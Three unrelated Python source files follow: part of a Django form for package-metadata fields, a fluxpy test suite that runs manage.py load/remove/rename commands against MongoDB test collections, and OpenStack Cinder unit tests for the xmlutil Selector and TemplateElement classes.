    ``requires_python`` / ``requires_external`` / ``project_url`` fields.
    """
    supported_platform = forms.CharField(required=False, widget=forms.Textarea(),
                                         help_text=_(u'The OS and CPU for which '
                                                      'the binary package was '
                                                      'compiled.'))
    keywords = forms.CharField(required=False,
                               help_text=_(u'A list of additional keywords to '
                                            'be used to assist searching for the '
                                            'package in a larger catalog'))
    # NOTE(review): verify_exists was removed in newer Django versions —
    # confirm against the project's pinned Django release.
    download_url = forms.URLField(required=False,
                                  verify_exists=True,
                                  help_text=_(u'A string containing the URL for '
                                               'the package\'s home page.'))
    author_email = forms.CharField(required=False,
                                   help_text=_(u'A string containing the '
                                                'author\'s e-mail address. It '
                                                'can contain a name and e-mail '
                                                'address in the legal forms for '
                                                'a RFC-822 \'From:\' header.'))
    maintainer = forms.CharField(required=False, widget=forms.Textarea(),
                                 help_text=_(u'A string containing at a minimum '
                                              'the maintainer\'s name. Contact '
                                              'information can also be added, '
                                              'separating each line with '
                                              'newlines.'))
    maintainer_email = forms.CharField(required=False,
                                       help_text=_(u'A string containing the '
                                                    'maintainer\'s e-mail address. '
                                                    'It can contain a name and '
                                                    'e-mail address in the legal '
                                                    'forms for a RFC-822 '
                                                    '\'From:\' header.'))
    license = forms.CharField(required=False, widget=forms.Textarea(),
                              help_text=_(u'Text indicating the license '
                                           'covering the package where the '
                                           'license is not a selection from the '
                                           '"License" Trove classifiers.'))
    classifier = forms.ModelMultipleChoiceField(required=False,
                                                queryset=Classifier.objects.all(),
                                                help_text=_(u'Trove classifiers'))
    requires_dist = LinesField(required=False,
                               help_text=_(u'Each line contains a string '
                                            'describing some other module or '
                                            'package required by this package.'))
    provides_dist = LinesField(required=False,
                               help_text=_(u'Each line contains a string '
                                            'describing a package or module that '
                                            'will be provided by this package '
                                            'once it is installed'))
    obsoletes_dist = LinesField(required=False,
                                help_text=_(u'Each line contains a string '
                                             'describing a package or module that '
                                             'this package renders obsolete, '
                                             'meaning that the two packages '
                                             'should not be installed at the '
                                             'same time'))
    requires_python = forms.CharField(required=False,
                                      help_text=_(u'This field specifies the '
                                                   'Python version(s) that the '
                                                   'distribution is guaranteed '
                                                   'to be compatible with.'))
    requires_external = forms.CharField(required=False, widget=forms.Textarea(),
                                        help_text=_(u'Each line contains a '
                                                     'string describing some '
                                                     'dependency in the system '
                                                     'that the distribution is '
                                                     'to be used.'))
    project_url = forms.CharField(required=False, widget=forms.Textarea(),
                                  help_text=_(u'Each line is a string containing '
                                               'a browsable URL for the project '
                                               'and a label for it, separated '
                                               'by a comma: "Bug Tracker, '
                                               'http://bugs.project.com"'))
| |
import ast
import sys
import csv
import datetime
import os
import unittest
import subprocess
import pandas as pd
import numpy as np
import h5py
from pymongo import MongoClient
from fluxpy import __path__ as fluxpy_module_path
from fluxpy import DB
from fluxpy.models import KrigedXCO2Matrix, SpatioTemporalMatrix, XCO2Matrix
from fluxpy.mediators import Grid3DMediator, Grid4DMediator, Unstructured3DMediator, DB
FNULL = open(os.devnull, 'w')
class TestManage(unittest.TestCase):
    '''Tests manage.py command line functionality'''
    # Handle to the MongoDB test database; used to verify command side effects.
    db = MongoClient()[DB]
    def load_test_data(self):
        '''Load the casa_gfed_load_test fixture, removing any stale copy first.'''
        # remove any stale sample data and reload
        cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
        subprocess.call(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        cmd = '''python ../../manage.py load -p casagfed2004.mat -n casa_gfed_load_test -m SpatioTemporalMatrix'''
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    def test_load_command(self):
        '''
        Tests that command line manage.py load utility properly loads data and
        transfers config_file override options to database
        '''
        # remove any stale test data
        cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        # load some sample data, check for expected standard output information
        cmd = '''python ../../manage.py load -p casagfed2004.mat -n casa_gfed_load_test -m SpatioTemporalMatrix -o "title=MyData;timestamp=2010-10-10T00:00:00"'''
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        # len(split(x)) > 1 iff the substring x appeared in the output
        self.assertGreater(len(result.split('Upload complete!')),1)
        # now check metadata to see if it loaded correctly
        document = self.db['metadata'].find({'_id': 'casa_gfed_load_test'})
        self.assertGreater(document.count(),0)
        self.assertEqual(document[0]['title'], 'MyData')
        self.assertEqual(document[0]['dates'][0], '2010-10-10T00:00:00')
        # now remove
        cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
        subprocess.call(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
    def test_db_tools(self):
        '''
        commands to test:
        # test all iterations of db command:
        python manage.py db -l collections
        python manage.py db -l collections -x
        python manage.py db -l metadata
        python manage.py db -l coord_index
        python manage.py db -n casa_gfed_2004
        python manage.py db -a
        '''
        self.load_test_data()
        # check that the test dataset is listed w/ the appropriate number of records
        cmd = 'python ../../manage.py db -l collections -x'
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        self.assertGreater(len(result.split('casa_gfed_load_test (8 records)')),1)
        # check that the metadata table lists the test dataset
        cmd = 'python ../../manage.py db -l metadata'
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        self.assertGreater(len(result.split('casa_gfed_load_test')),1)
        # check that the coord_index table lists the test dataset
        cmd = 'python ../../manage.py db -l coord_index'
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        self.assertGreater(len(result.split('casa_gfed_load_test')),1)
        # check that the metadata is returned as expected
        cmd = 'python ../../manage.py db -n casa_gfed_load_test'
        # the command prints a dict literal; parse it back for a structural compare
        result = ast.literal_eval(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT).replace('\n',''))
        meta = self.db['metadata'].find({'_id': 'casa_gfed_load_test'})[0]
        self.assertDictEqual(result, meta)
        # check that audit utility returns... anything
        cmd = 'python ../../manage.py db -a'
        result = subprocess.check_output(cmd, shell=True)
        self.assertGreater(len(result.split('audit complete')),1)
        # now remove
        cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    def test_remove_command(self):
        '''
        Finally, test the 'remove' utility, ensuring collection has been purged from metadata as well
        '''
        self.load_test_data()
        # check that command results indicate successful removal
        cmd = 'python ../../manage.py remove -n casa_gfed_load_test'
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        self.assertGreater(len(result.split('casa_gfed_load_test" successfully removed')),1)
        # check that data was in fact removed
        self.assertEqual('casa_gfed_load_test' in self.db.collection_names(), False)
        # the collection must also be purged from the bookkeeping tables
        for cname in ['metadata', 'coord_index']:
            tmp = [t['_id'] for t in list(self.db[cname].find())]
            self.assertEqual('casa_gfed_load_test' in tmp, False)
    def test_rename_command(self):
        '''Test the rename utility'''
        self.load_test_data()
        # check that command results indicate successful renaming
        cmd = 'python ../../manage.py rename -n casa_gfed_load_test -r fancypants'
        result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        self.assertGreater(len(result.split('casa_gfed_load_test" to "fancypants"')),1)
        # check that database includes the new name but not the old name
        self.assertEqual('casa_gfed_load_test' in self.db.collection_names(), False)
        self.assertEqual('fancypants' in self.db.collection_names(), True)
        for cname in ['metadata', 'coord_index']:
            tmp = [t['_id'] for t in list(self.db[cname].find())]
            self.assertEqual('casa_gfed_load_test' in tmp, False)
            self.assertEqual('fancypants' in tmp, True)
        # now clean up by removing
        cmd = 'python ../../manage.py remove -n fancypants'
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
class TestSpatioTemporalMatrixes(unittest.TestCase):
    '''Tests for proper handling of inverted CO2 surface fluxes (e.g. CASA GFED output)'''
    mediator = Grid4DMediator()
    path = os.path.join(fluxpy_module_path[0], 'tests')

    @classmethod
    def _purge_test_collections(cls):
        '''Drop the test collections and their coord_index/metadata entries.

        Shared by setUpClass and tearDownClass (previously duplicated
        verbatim in both) so each run starts and ends with a clean state.
        '''
        mediator = Grid3DMediator()
        for collection_name in ('test3',):
            mediator.client[mediator.db_name].drop_collection(collection_name)
            mediator.client[mediator.db_name]['coord_index'].remove({
                '_id': collection_name
            })
            mediator.client[mediator.db_name]['metadata'].remove({
                '_id': collection_name
            })

    @classmethod
    def setUpClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    @classmethod
    def tearDownClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    def test_model_instance(self):
        '''Should properly instantiate an SpatioTemporalMatrix model instance'''
        flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
            timestamp='2004-06-30T00:00:00', var_name='test', span=10800)
        self.assertEqual(flux.var_name, 'test')
        self.assertEqual(flux.steps, [10800])
        self.assertEqual(flux.timestamp, '2004-06-30T00:00:00')

    def test_model_var_name_inference(self):
        '''Should infer the var_name in an SpatioTemporalMatrix model instance'''
        flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'))
        self.assertEqual(flux.var_name, 'casa_gfed_2004')

    def test_model_describe(self):
        '''Should produce metadata for a SpatioTemporalMatrix model instance'''
        flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
            timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004',span=10800)
        df = flux.describe()
        self.assertEqual(df['bbox'], (-166.5, 10.5, -50.5, 69.5))
        self.assertEqual(df['bboxmd5'], '6f3e33c145010bc74c5ccd3ba772f504')
        self.assertEqual(df['dates'], ['2004-06-30T00:00:00', '2004-06-30T21:00:00'])
        self.assertEqual(df['gridded'], True)
        self.assertEqual(df['grid'], {'units': 'degrees', 'x': 1.0, 'y': 1.0})
        self.assertEqual(df['steps'], [10800])

    def test_model_extract(self):
        '''Should extract a DataFrame in an SpatioTemporalMatrix model instance'''
        flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
            timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004')
        df = flux.extract()
        self.assertEqual(df.shape, (2635, 8))
        self.assertEqual(str(df.columns[1]), '2004-06-30 03:00:00')
        self.assertEqual(df.index.values[1], (-165.5, 61.5))

    def test_save_to_db(self):
        '''Should successfully save proper data representation to database'''
        flux = SpatioTemporalMatrix(os.path.join(self.path, 'casagfed2004.mat'),
            timestamp='2004-06-30T00:00:00', var_name='casa_gfed_2004')
        self.mediator.save('test3', flux)
        query = self.mediator.client[self.mediator.db_name]['test3'].find({
            '_id': datetime.datetime(2004, 6, 30, 0, 0, 0),
        })
        self.assertEqual(len(query[0]['values']), 2635)
        self.assertEqual(query[0]['values'][0], 0.08)
        # Test the mediator's summarize() method
        summary = self.mediator.summarize('test3')
        self.assertEqual(summary.keys(), ['values'])
        self.assertEqual(summary['values'].keys(), [
            'std', 'max', 'min', 'median', 'mean'
        ])
class TestXCO2Data(unittest.TestCase):
    '''Tests for proper handling of XCO2 retrievals'''
    mediator = Unstructured3DMediator()
    path = os.path.join(fluxpy_module_path[0], 'tests')

    @classmethod
    def _purge_test_collections(cls):
        '''Drop the test collections and their coord_index/metadata entries.

        Shared by setUpClass and tearDownClass (previously duplicated
        verbatim in both) so each run starts and ends with a clean state.
        '''
        mediator = Grid3DMediator()
        for collection_name in ('test',):
            mediator.client[mediator.db_name].drop_collection(collection_name)
            mediator.client[mediator.db_name]['coord_index'].remove({
                '_id': collection_name
            })
            mediator.client[mediator.db_name]['metadata'].remove({
                '_id': collection_name
            })

    @classmethod
    def setUpClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    @classmethod
    def tearDownClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    def test_model_instance(self):
        '''Should properly instantiate a model instance'''
        xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
            timestamp='2009-06-15')
        self.assertEqual(xco2.var_name, 'XCO2')
        self.assertEqual(xco2.timestamp, '2009-06-15')

    def test_model_extract(self):
        '''Should create proper DataFrame from reading file data'''
        xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
            timestamp='2009-06-15')
        df1 = xco2.extract()
        self.assertEqual(df1.shape, (1311, 7))
        # Should allow overrides in the extract() method; only the side
        # effect on the timestamp attribute is checked here.
        xco2.extract(timestamp='2010-01-01')
        self.assertEqual(xco2.timestamp, '2010-01-01')

    def test_save_to_db(self):
        '''Should successfully save proper data representation to database'''
        xco2 = XCO2Matrix(os.path.join(self.path, 'xco2.mat'),
            timestamp='2009-06-15')
        self.mediator.save('test', xco2)
        query = self.mediator.client[self.mediator.db_name]['test'].find({
            'timestamp': datetime.datetime(2009, 6, 16, 0, 0, 0),
        })
        self.assertEqual(query[0]['properties']['value'], 386.79)
class TestKrigedXCO2Data(unittest.TestCase):
    '''Tests for proper handling of kriged (gridded) XCO2 data'''
    mediator = Grid3DMediator()
    path = os.path.join(fluxpy_module_path[0], 'tests')

    @classmethod
    def _purge_test_collections(cls):
        '''Drop the test collections and their coord_index/metadata entries.

        Shared by setUpClass, tearDownClass and test_save_to_db, which
        previously repeated this cleanup verbatim three times.
        '''
        mediator = Grid3DMediator()
        for collection_name in ('test2',):
            mediator.client[mediator.db_name].drop_collection(collection_name)
            mediator.client[mediator.db_name]['coord_index'].remove({
                '_id': collection_name
            })
            mediator.client[mediator.db_name]['metadata'].remove({
                '_id': collection_name
            })

    @classmethod
    def setUpClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    @classmethod
    def tearDownClass(cls):
        # Clean up: Remove the test collections and references
        cls._purge_test_collections()

    def test_model_instance(self):
        '''Should properly instantiate a model instance'''
        xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
            timestamp='2009-06-15')
        self.assertEqual(xco2.var_name, 'krigedData')
        self.assertEqual(xco2.spans, [518400])
        self.assertEqual(xco2.timestamp, '2009-06-15')

    def test_model_extract(self):
        '''Should create proper DataFrame from reading file data'''
        xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
            timestamp='2009-06-15')
        df1 = xco2.extract()
        self.assertEqual(df1.shape, (14210, 9))
        # Should allow overrides in the extract() method; only the side
        # effect on the timestamp attribute is checked here.
        xco2.extract(timestamp='2010-01-01')
        self.assertEqual(xco2.timestamp, '2010-01-01')

    def test_save_to_db(self):
        '''Should successfully save proper data representation to database'''
        xco2 = KrigedXCO2Matrix(os.path.join(self.path, 'kriged_xco2.mat'),
            timestamp='2009-06-15')
        # Drop the old collection; it will be recreated when inserting
        self._purge_test_collections()
        self.mediator.save('test2', xco2)
        query = self.mediator.client[self.mediator.db_name]['test2'].find({
            '_id': datetime.datetime(2009, 6, 15, 0, 0, 0),
        })
        self.assertEqual(query[0]['_span'], 518400)
        self.assertEqual(len(query[0]['values']), 14210)
        # Test the mediator's summarize() method
        summary = self.mediator.summarize('test2')
        self.maxDiff = None # Show the full diff
        self.assertEqual(summary.keys(), ['errors', 'values'])
        self.assertEqual(summary['values'].keys(), [
            'std', 'max', 'min', 'median', 'mean'
        ])
# class TestHDF5(unittest.TestCase):
# '''Tests HDF5 fluency and conversion utilities'''
#
# path = '/usr/local/project/flux-python-api/fluxpy/tests/'
# filename = 'temp.h5'
#
# def test_bulk_hdf5_to_csv(self):
# '''Should bulk convert HDF5 files to CSV files'''
# hdf_path = os.path.join(self.path, self.filename)
# csv_path = os.path.join(self.path, self.filename.split('.')[0] + '.csv')
#
# # Delete file; create a new one
# try:
# os.remove(hdf_path)
#
# except OSError:
# pass
#
# store = h5py.File(os.path.join(self.path, self.filename), 'a')
#
# # Populate the token HDF file
# data = store.create_dataset('temp', np.array([10, 10]), dtype='i')
# data[:,:] = np.arange(10)
# store.close()
#
# bulk_hdf5_to_csv(self.path, 'temp', regex='^.*\.h5')
#
# with open(csv_path) as stream:
# reader = csv.reader(stream)
# for line in reader:
# # Skip header and skip the index (first item in each row)
# if reader.line_num != 1:
# self.assertEqual(line[1:], map(str, range(10)))
#
# # Clean up
# os.remove(hdf_path)
# os.remove(csv_path)
if __name__ == '__main__':
    # Allow running this test module directly with the stdlib test runner.
    unittest.main()
| |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from cinder.api import xmlutil
from cinder import test
class SelectorTest(test.TestCase):
    """Unit tests for xmlutil.Selector and xmlutil.ConstantSelector."""

    # Nested sample document that every selector in these tests is applied to.
    obj_for_test = {
        'test': {
            'name': 'test',
            'values': [1, 2, 3],
            'attrs': {'foo': 1, 'bar': 2, 'baz': 3},
        },
    }

    def test_empty_selector(self):
        """A selector with an empty chain returns the object unchanged."""
        selector = xmlutil.Selector()
        self.assertEqual(0, len(selector.chain))
        self.assertEqual(self.obj_for_test, selector(self.obj_for_test))

    def test_dict_selector(self):
        """A single string link selects the matching dict entry."""
        selector = xmlutil.Selector('test')
        self.assertEqual(1, len(selector.chain))
        self.assertEqual('test', selector.chain[0])
        self.assertEqual(self.obj_for_test['test'],
                         selector(self.obj_for_test))

    def test_datum_selector(self):
        """Two chained keys walk two levels into the object."""
        selector = xmlutil.Selector('test', 'name')
        self.assertEqual(2, len(selector.chain))
        self.assertEqual('test', selector.chain[0])
        self.assertEqual('name', selector.chain[1])
        self.assertEqual('test', selector(self.obj_for_test))

    def test_list_selector(self):
        """An integer link indexes into a list value."""
        selector = xmlutil.Selector('test', 'values', 0)
        self.assertEqual(3, len(selector.chain))
        self.assertEqual('test', selector.chain[0])
        self.assertEqual('values', selector.chain[1])
        self.assertEqual(0, selector.chain[2])
        self.assertEqual(1, selector(self.obj_for_test))

    def test_items_selector(self):
        """A get_items link yields the (key, value) pairs of a dict."""
        selector = xmlutil.Selector('test', 'attrs', xmlutil.get_items)
        self.assertEqual(3, len(selector.chain))
        self.assertEqual(xmlutil.get_items, selector.chain[2])
        for key, value in selector(self.obj_for_test):
            self.assertEqual(self.obj_for_test['test']['attrs'][key], value)

    def test_missing_key_selector(self):
        """A missing key yields None unless the selector is told to raise."""
        selector = xmlutil.Selector('test2', 'attrs')
        self.assertIsNone(selector(self.obj_for_test))
        self.assertRaises(KeyError, selector, self.obj_for_test, True)

    def test_constant_selector(self):
        """A ConstantSelector returns its fixed value for any object."""
        selector = xmlutil.ConstantSelector('Foobar')
        self.assertEqual('Foobar', selector.value)
        self.assertEqual('Foobar', selector(self.obj_for_test))
class TemplateElementTest(test.TestCase):
    """Unit tests for xmlutil.TemplateElement construction, child
    management, attribute/text selectors, and rendering."""
    def test_element_initial_attributes(self):
        """Constructor merges attrib dict with keyword attrs; kwargs win (c=4)."""
        # Create a template element with some attributes
        elem = xmlutil.TemplateElement('test', attrib=dict(a=1, b=2, c=3),
                                       c=4, d=5, e=6)
        # Verify all the attributes are as expected
        expected = dict(a=1, b=2, c=4, d=5, e=6)
        for k, v in expected.items():
            self.assertEqual(v, elem.attrib[k].chain[0])
    def test_element_get_attributes(self):
        """get() returns the selector stored for each attribute."""
        expected = dict(a=1, b=2, c=3)
        # Create a template element with some attributes
        elem = xmlutil.TemplateElement('test', attrib=expected)
        # Verify that get() retrieves the attributes
        for k, v in expected.items():
            self.assertEqual(v, elem.get(k).chain[0])
    def test_element_set_attributes(self):
        """set() wraps values in selectors; None defaults to the attr name."""
        attrs = dict(a=None, b='foo', c=xmlutil.Selector('foo', 'bar'))
        # Create a bare template element with no attributes
        elem = xmlutil.TemplateElement('test')
        # Set the attribute values
        for k, v in attrs.items():
            elem.set(k, v)
        # Now verify what got set
        self.assertEqual(1, len(elem.attrib['a'].chain))
        self.assertEqual('a', elem.attrib['a'].chain[0])
        self.assertEqual(1, len(elem.attrib['b'].chain))
        self.assertEqual('foo', elem.attrib['b'].chain[0])
        self.assertEqual(attrs['c'], elem.attrib['c'])
    def test_element_attribute_keys(self):
        """keys() exposes all attribute names."""
        attrs = dict(a=1, b=2, c=3, d=4)
        expected = set(attrs.keys())
        # Create a template element with some attributes
        elem = xmlutil.TemplateElement('test', attrib=attrs)
        # Now verify keys
        self.assertEqual(expected, set(elem.keys()))
    def test_element_attribute_items(self):
        """items() yields every (name, selector) pair exactly once."""
        expected = dict(a=xmlutil.Selector(1),
                        b=xmlutil.Selector(2),
                        c=xmlutil.Selector(3))
        keys = set(expected.keys())
        # Create a template element with some attributes
        elem = xmlutil.TemplateElement('test', attrib=expected)
        # Now verify items
        for k, v in elem.items():
            self.assertEqual(expected[k], v)
            keys.remove(k)
        # Did we visit all keys?
        self.assertEqual(0, len(keys))
    def test_element_selector_none(self):
        """Omitting selector yields an empty Selector chain."""
        # Create a template element with no selector
        elem = xmlutil.TemplateElement('test')
        self.assertEqual(0, len(elem.selector.chain))
    def test_element_selector_string(self):
        """A string selector is wrapped in a one-link Selector."""
        # Create a template element with a string selector
        elem = xmlutil.TemplateElement('test', selector='test')
        self.assertEqual(1, len(elem.selector.chain))
        self.assertEqual('test', elem.selector.chain[0])
    def test_element_selector(self):
        """An explicit Selector instance is stored as-is."""
        sel = xmlutil.Selector('a', 'b')
        # Create a template element with an explicit selector
        elem = xmlutil.TemplateElement('test', selector=sel)
        self.assertEqual(sel, elem.selector)
    def test_element_subselector_none(self):
        """Omitting subselector leaves it None."""
        # Create a template element with no subselector
        elem = xmlutil.TemplateElement('test')
        self.assertIsNone(elem.subselector)
    def test_element_subselector_string(self):
        """A string subselector is wrapped in a one-link Selector."""
        # Create a template element with a string subselector
        elem = xmlutil.TemplateElement('test', subselector='test')
        self.assertEqual(1, len(elem.subselector.chain))
        self.assertEqual('test', elem.subselector.chain[0])
    def test_element_subselector(self):
        """An explicit Selector subselector is stored as-is."""
        sel = xmlutil.Selector('a', 'b')
        # Create a template element with an explicit subselector
        elem = xmlutil.TemplateElement('test', subselector=sel)
        self.assertEqual(sel, elem.subselector)
    def test_element_append_child(self):
        """append() adds a child, indexable by position and tag; dup tags raise."""
        # Create an element
        elem = xmlutil.TemplateElement('test')
        # Make sure the element starts off empty
        self.assertEqual(0, len(elem))
        # Create a child element
        child = xmlutil.TemplateElement('child')
        # Append the child to the parent
        elem.append(child)
        # Verify that the child was added
        self.assertEqual(1, len(elem))
        self.assertEqual(child, elem[0])
        self.assertIn('child', elem)
        self.assertEqual(child, elem['child'])
        # Ensure that multiple children of the same name are rejected
        child2 = xmlutil.TemplateElement('child')
        self.assertRaises(KeyError, elem.append, child2)
    def test_element_extend_children(self):
        """extend() adds children in order; a duplicate tag aborts the extend."""
        # Create an element
        elem = xmlutil.TemplateElement('test')
        # Make sure the element starts off empty
        self.assertEqual(0, len(elem))
        # Create a few children
        children = [xmlutil.TemplateElement('child1'),
                    xmlutil.TemplateElement('child2'),
                    xmlutil.TemplateElement('child3'), ]
        # Extend the parent by those children
        elem.extend(children)
        # Verify that the children were added
        self.assertEqual(3, len(elem))
        for idx in range(len(elem)):
            self.assertEqual(children[idx], elem[idx])
            self.assertIn(children[idx].tag, elem)
            self.assertEqual(children[idx], elem[children[idx].tag])
        # Ensure that multiple children of the same name are rejected
        children2 = [xmlutil.TemplateElement('child4'),
                     xmlutil.TemplateElement('child1'), ]
        self.assertRaises(KeyError, elem.extend, children2)
        # Also ensure that child4 was not added
        self.assertEqual(3, len(elem))
        self.assertEqual('child3', elem[-1].tag)
    def test_element_insert_child(self):
        """insert() places a child at a position; duplicate tags raise."""
        # Create an element
        elem = xmlutil.TemplateElement('test')
        # Make sure the element starts off empty
        self.assertEqual(0, len(elem))
        # Create a few children
        children = [xmlutil.TemplateElement('child1'),
                    xmlutil.TemplateElement('child2'),
                    xmlutil.TemplateElement('child3'), ]
        # Extend the parent by those children
        elem.extend(children)
        # Create a child to insert
        child = xmlutil.TemplateElement('child4')
        # Insert it
        elem.insert(1, child)
        # Ensure the child was inserted in the right place
        self.assertEqual(4, len(elem))
        children.insert(1, child)
        for idx in range(len(elem)):
            self.assertEqual(children[idx], elem[idx])
            self.assertIn(children[idx].tag, elem)
            self.assertEqual(children[idx], elem[children[idx].tag])
        # Ensure that multiple children of the same name are rejected
        child2 = xmlutil.TemplateElement('child2')
        self.assertRaises(KeyError, elem.insert, 2, child2)
    def test_element_remove_child(self):
        """remove() requires the identical child object, not an equal tag."""
        # Create an element
        elem = xmlutil.TemplateElement('test')
        # Make sure the element starts off empty
        self.assertEqual(0, len(elem))
        # Create a few children
        children = [xmlutil.TemplateElement('child1'),
                    xmlutil.TemplateElement('child2'),
                    xmlutil.TemplateElement('child3'), ]
        # Extend the parent by those children
        elem.extend(children)
        # Create a test child to remove
        child = xmlutil.TemplateElement('child2')
        # Try to remove it
        self.assertRaises(ValueError, elem.remove, child)
        # Ensure that no child was removed
        self.assertEqual(3, len(elem))
        # Now remove a legitimate child
        elem.remove(children[1])
        # Ensure that the child was removed
        self.assertEqual(2, len(elem))
        self.assertEqual(children[0], elem[0])
        self.assertEqual(children[2], elem[1])
        self.assertNotIn('child2', elem)
        # Ensure the child cannot be retrieved by name
        def get_key(elem, key):
            return elem[key]
        self.assertRaises(KeyError, get_key, elem, 'child2')
    def test_element_text(self):
        """text accepts strings (wrapped as selectors), selectors, None, and del."""
        # Create an element
        elem = xmlutil.TemplateElement('test')
        # Ensure that it has no text
        self.assertIsNone(elem.text)
        # Try setting it to a string and ensure it becomes a selector
        elem.text = 'test'
        self.assertTrue(hasattr(elem.text, 'chain'))
        self.assertEqual(1, len(elem.text.chain))
        self.assertEqual('test', elem.text.chain[0])
        # Try resetting the text to None
        elem.text = None
        self.assertIsNone(elem.text)
        # Now make up a selector and try setting the text to that
        sel = xmlutil.Selector()
        elem.text = sel
        self.assertEqual(sel, elem.text)
        # Finally, try deleting the text and see what happens
        del elem.text
        self.assertIsNone(elem.text)
    def test_apply_attrs(self):
        """apply() stringifies selector results onto an etree element's attrs."""
        # Create a template element
        attrs = dict(attr1=xmlutil.ConstantSelector(1),
                     attr2=xmlutil.ConstantSelector(2))
        tmpl_elem = xmlutil.TemplateElement('test', attrib=attrs)
        # Create an etree element
        elem = etree.Element('test')
        # Apply the template to the element
        tmpl_elem.apply(elem, None)
        # Now, verify the correct attributes were set
        for k, v in elem.items():
            self.assertEqual(str(attrs[k].value), v)
    def test_apply_text(self):
        """apply() stringifies the text selector result onto the element."""
        # Create a template element
        tmpl_elem = xmlutil.TemplateElement('test')
        tmpl_elem.text = xmlutil.ConstantSelector(1)
        # Create an etree element
        elem = etree.Element('test')
        # Apply the template to the element
        tmpl_elem.apply(elem, None)
        # Now, verify the text was set
        self.assertEqual(str(tmpl_elem.text.value), elem.text)
    def test__render(self):
        """_render merges master and slave attributes, parent, and nsmap."""
        attrs = dict(attr1=xmlutil.ConstantSelector(1),
                     attr2=xmlutil.ConstantSelector(2),
                     attr3=xmlutil.ConstantSelector(3))
        # Create a master template element
        master_elem = xmlutil.TemplateElement('test', attr1=attrs['attr1'])
        # Create a couple of slave template element
        slave_elems = [xmlutil.TemplateElement('test', attr2=attrs['attr2']),
                       xmlutil.TemplateElement('test', attr3=attrs['attr3']), ]
        # Try the render
        elem = master_elem._render(None, None, slave_elems, None)
        # Verify the particulars of the render
        self.assertEqual('test', elem.tag)
        self.assertEqual(0, len(elem.nsmap))
        for k, v in elem.items():
            self.assertEqual(str(attrs[k].value), v)
        # Create a parent for the element to be rendered
        parent = etree.Element('parent')
        # Try the render again...
        elem = master_elem._render(parent, None, slave_elems, dict(a='foo'))
        # Verify the particulars of the render
        self.assertEqual(1, len(parent))
        self.assertEqual(parent[0], elem)
        self.assertEqual(1, len(elem.nsmap))
        self.assertEqual('foo', elem.nsmap['a'])
    def test_render(self):
        """render() returns one (element, datum) pair per selected datum."""
        # Create a template element
        tmpl_elem = xmlutil.TemplateElement('test')
        tmpl_elem.text = xmlutil.Selector()
        # Create the object we're going to render
        obj = ['elem1', 'elem2', 'elem3', 'elem4']
        # Try a render with no object
        elems = tmpl_elem.render(None, None)
        self.assertEqual(0, len(elems))
        # Try a render with one object
        elems = tmpl_elem.render(None, 'foo')
        self.assertEqual(1, len(elems))
        self.assertEqual('foo', elems[0][0].text)
        self.assertEqual('foo', elems[0][1])
        # Now, try rendering an object with multiple entries
        parent = etree.Element('parent')
        elems = tmpl_elem.render(parent, obj)
        self.assertEqual(4, len(elems))
        # Check the results
        for idx in range(len(obj)):
            self.assertEqual(obj[idx], elems[idx][0].text)
            self.assertEqual(obj[idx], elems[idx][1])
    def test_subelement(self):
        """SubTemplateElement attaches itself to its parent when one is given."""
        # Try the SubTemplateElement constructor
        parent = xmlutil.SubTemplateElement(None, 'parent')
        self.assertEqual('parent', parent.tag)
        self.assertEqual(0, len(parent))
        # Now try it with a parent element
        child = xmlutil.SubTemplateElement(parent, 'child')
        self.assertEqual('child', child.tag)
        self.assertEqual(1, len(parent))
        self.assertEqual(parent[0], child)
    def test_wrap(self):
        """unwrap() returns the element itself; wrap() produces a Template root."""
        # These are strange methods, but they make things easier
        elem = xmlutil.TemplateElement('test')
        self.assertEqual(elem, elem.unwrap())
        self.assertEqual(elem, elem.wrap().root)
    def test_dyntag(self):
        """A Selector tag is resolved per-datum, producing one element per item."""
        obj = ['a', 'b', 'c']
        # Create a template element with a dynamic tag
        tmpl_elem = xmlutil.TemplateElement(xmlutil.Selector())
        # Try the render
        parent = etree.Element('parent')
        elems = tmpl_elem.render(parent, obj)
        # Verify the particulars of the render
        self.assertEqual(len(obj), len(elems))
